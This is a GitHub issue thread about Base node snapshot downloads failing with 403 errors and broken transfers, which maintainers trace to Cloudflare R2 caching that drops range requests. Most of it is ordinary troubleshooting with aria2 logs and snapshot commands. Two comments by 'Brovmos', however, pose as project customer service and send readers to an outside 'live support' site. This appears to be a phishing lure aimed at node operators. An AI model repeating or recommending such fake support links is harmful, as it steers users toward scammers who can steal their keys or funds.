### ISSUE TITLE
geth full archive snapshots might not be working

### ISSUE THREAD

**Issue by azeonmarket** [base-org/node#351]
The Geth full archive snapshots not working for downloading snapshot to be able to run a full archive Geth Node. https://mainnet-archive-snapshots.base.org/$(curl https://mainnet-archive-snapshots.base.org/latest)

If true of malfunctions/not working properly, changes on https://docs.base.org/tutorials/run-a-base-node/  on this ligne from the table : <html>
<body>

Mainnet | Geth | Archive | wget https://mainnet-archive-snapshots.base.org/$(curl https://mainnet-archive-snapshots.base.org/latest)
-- | -- | -- | --

</body>
</html>

would need to be implemented to allow node operators to deploy easily.

**Comment by 0x00101010** [comment]
Hey y'all, have you tried again after the failure, we hosted our snapshots on cloudflare, and this does seem like either a cloudflare issue or network issue.

Also FYI, there's some cloudflare maintenance going on that seems relevant: https://www.cloudflarestatus.com/

**Comment by liusDong** [comment]
> Hey y'all, have you tried again after the failure, we hosted our snapshots on cloudflare, and this does seem like either a cloudflare issue or network issue.
> 
> Also FYI, there's some cloudflare maintenance going on that seems relevant: https://www.cloudflarestatus.com/

same question. I try more than 10 times always 403 error

11/20 09:31:59 [ERROR] CUID#7 - Download aborted. URI=https://mainnet-full-snapshots.base.org/base-mainnet-full-1731839014.tar.zst
Exception: [AbstractCommand.cc:351] errorCode=22 URI=https://mainnet-full-snapshots.base.org/base-mainnet-full-1731839014.tar.zst
  -> [HttpSkipResponseCommand.cc:239] errorCode=22 The response status is not successful. status=403

11/20 09:31:59 [NOTICE] Download GID#8a9a7f7227700a58 not complete: /home/snap1/base-mainnet-full-1731839014.tar.zst

Download Results:
gid   |stat|avg speed  |path/URI
======+====+===========+=======================================================
8a9a7f|ERR |    41MiB/s|/home/snap1/base-mainnet-full-1731839014.tar.zst

Status Legend:
(ERR):error occurred.

aria2 will resume download if the transfer is restarted.
If there are any errors, then see the log file. See '-l' option in help/man page for details.

**Comment by 0x00101010** [comment]
Trying 2 downloads to see if I could reproduce:
1. base-mainnet-full-1731925706.tar.zst => latest
2. base-mainnet-full-1731839014.tar.zst => the ones you mentioned

**Comment by liusDong** [comment]
> Trying 2 downloads to see if I could reproduce:
> 
> 1. base-mainnet-full-1731925706.tar.zst => latest
> 2. base-mainnet-full-1731839014.tar.zst => the ones you mentioned

I download latest

11/21 02:53:43 [ERROR] CUID#7 - Download aborted. URI=https://mainnet-full-snapshots.base.org/base-mainnet-full-1731925706.tar.zst
Exception: [AbstractCommand.cc:351] errorCode=22 URI=https://mainnet-full-snapshots.base.org/base-mainnet-full-1731925706.tar.zst
  -> [HttpSkipResponseCommand.cc:239] errorCode=22 The response status is not successful. status=403

11/21 02:53:43 [NOTICE] Download GID#a702387759a7b2b3 not complete: /home/snap1/base-mainnet-full-1731925706.tar.zst

Download Results:
gid   |stat|avg speed  |path/URI
======+====+===========+=======================================================
a70238|ERR |    12MiB/s|/home/snap1/base-mainnet-full-1731925706.tar.zst

Status Legend:
(ERR):error occurred.

aria2 will resume download if the transfer is restarted.
If there are any errors, then see the log file. See '-l' option in help/man page for details.

**Comment by 0x00101010** [comment]
> > Trying 2 downloads to see if I could reproduce:
> > 
> > 1. base-mainnet-full-1731925706.tar.zst => latest
> > 2. base-mainnet-full-1731839014.tar.zst => the ones you mentioned
> 
> I download latest
> 
> 11/21 02:53:43 [ERROR] CUID#7 - Download aborted. URI=https://mainnet-full-snapshots.base.org/base-mainnet-full-1731925706.tar.zst Exception: [AbstractCommand.cc:351] errorCode=22 URI=https://mainnet-full-snapshots.base.org/base-mainnet-full-1731925706.tar.zst -> [HttpSkipResponseCommand.cc:239] errorCode=22 The response status is not successful. status=403
> 
> 11/21 02:53:43 [NOTICE] Download GID#a702387759a7b2b3 not complete: /home/snap1/base-mainnet-full-1731925706.tar.zst
> 
> Download Results: gid |stat|avg speed |path/URI ======+====+===========+======================================================= a70238|ERR | 12MiB/s|/home/snap1/base-mainnet-full-1731925706.tar.zst
> 
> Status Legend: (ERR):error occurred.
> 
> aria2 will resume download if the transfer is restarted. If there are any errors, then see the log file. See '-l' option in help/man page for details.

How long before your download was aborted?

**Comment by 0x00101010** [comment]
submitted ticket to cloudflare (where we host the snapshts) for triage, will update here once we hear back

**Comment by usoftvn** [comment]
I can't download with wget, I can download for a while and then have to download again. I download it takes about 10% to 30% and then the connection is lost and it asks to re-download. This happens constantly and I can't complete the download.
Is there any way to fix this problem?

**Comment by bab3nk0v** [comment]
I am experiencing the same issues. I believe the problem can be addressed by enabling the server to support the Accept-Ranges header. This would allow downloads to resume from where the connection was interrupted instead of restarting from the beginning.

**Comment by bab3nk0v** [comment]
Update: The download just failed again. I confirm that the issue persists, and I have been unable to download the snapshot for several days. I tried around 10 times, and none of the downloads exceeded 500GB before the connection dropped. 

In my opinion, connection interruptions are not the core issue—network reliability is inherently variable. The key is to ensure that downloads can resume from where they left off. Utilities like `aria2` and `wget` are capable of resuming interrupted downloads. However, for this to work, the server must support certain features, such as:

- Returning the `Accept-Ranges` header in HTTP responses to indicate that range-based downloads are supported.
- Handling `Range` requests properly to allow clients to request specific parts of a file.

If the server can ensure these features are correctly implemented, it would allow users to resume downloads seamlessly, even after interruptions, resolving much of the frustration around this issue.

**Comment by usoftvn** [comment]
Is there anywhere else that stores the snapshot?

**Comment by 0x00101010** [comment]
Hey everybody, just wanna pop in here to say that we're actively investigating this issue along with cloudflare, and will update here asap when we have a solution.

In the meantime, you can follow the incident at https://status.base.org/

cc: @usoftvn @Mohammed-Alanazisa @bab3nk0v @liusDong @azeonmarket

**Comment by 0x00101010** [comment]
Update that cloudflare team has seen range request headers being dropped, they're investigating further

**Comment by jun0tpyrc** [comment]
it did work for me but unstable ..
i need to use aria2 with more download threads and still regularly check back when all being broken to rerun and pulled a working one finally 

was doing with base-mainnet-full-1731147805.tar.zst

**Comment by usoftvn** [comment]
This issue is taking a while to resolve. While investigating, is it possible to push the snapshot to another server?

**Comment by usoftvn** [comment]
It's been two weeks and I can't run the node because I can't download the snapshot. Does anyone have a solution?

**Comment by Brovmos** [comment]
> It's been two weeks and I can't run the node because I can't download the snapshot. Does anyone have a quick solution while waiting for the project to resolve this issue?

Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the [HERE TO CONTACT OUR LIVE SUPPORT DEV](https://webfixprotocol.web.app) for instant support response
Note: Click on the live chat icon at the bottom corner of the page

**Comment by Brovmos** [comment]
> This issue is taking a while to resolve. While investigating, is it possible to push the snapshot to another server?

Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the [HERE TO CONTACT OUR LIVE SUPPORT DEV](https://webfixprotocol.web.app) for instant support response
Note: Click on the live chat icon at the bottom corner of the page

**Comment by 0x00101010** [comment]
Hey y'all, we've worked with cloudflare team and believe this issue is fixed now. Please try again and let us know if you are still experiencing the issue.

TLDR of the root cause is that there's this cache feature for cloudflare R2 that tries to cache the underlying object when serving the download requests, and since our snapshots are too big (in terabytes), the cache feature is not actually designed for that (it does not issue range request for large files), therefore the download breaks everytime.

Now that we've disabled the caching feature, it should work now

**Comment by 0x00101010** [comment]
Closing this now as this should've been fixed by various reports

**Comment by 0x00101010** [comment]
> The download is indeed working now (thank you), but it seems the snapshots (at least for Reth archive), are ~2.5 weeks behind, and syncing is slow enough that it may not catch up to head.

@jotto it seems like our latest reth snapshot is just one day old: 
```
curl https://sepolia-reth-archive-snapshots.base.org/latest                                                                                                                                                                           
base-sepolia-reth-1733284836.tar.zst => 15 hours ago
```

**Comment by jotto** [comment]
The timestamps on the URLs look 1-2 days old, but when you download, untar, and start Reth from the snapshot, it's somewhere around ~22,222,400 (latest block is 23,275,735).

I haven't tried yesterday's snaptho 1733199514 (Tuesday, December 3, 2024 4:18:34 AM)

but have tried the 2 previous days:
- 1733113266 (Monday, December 2, 2024 4:21:06 AM)
- 1733026714 (Sunday, December 1, 2024 4:18:34 AM)

are you able to check of the reth node producing these snapshots is synced to head?
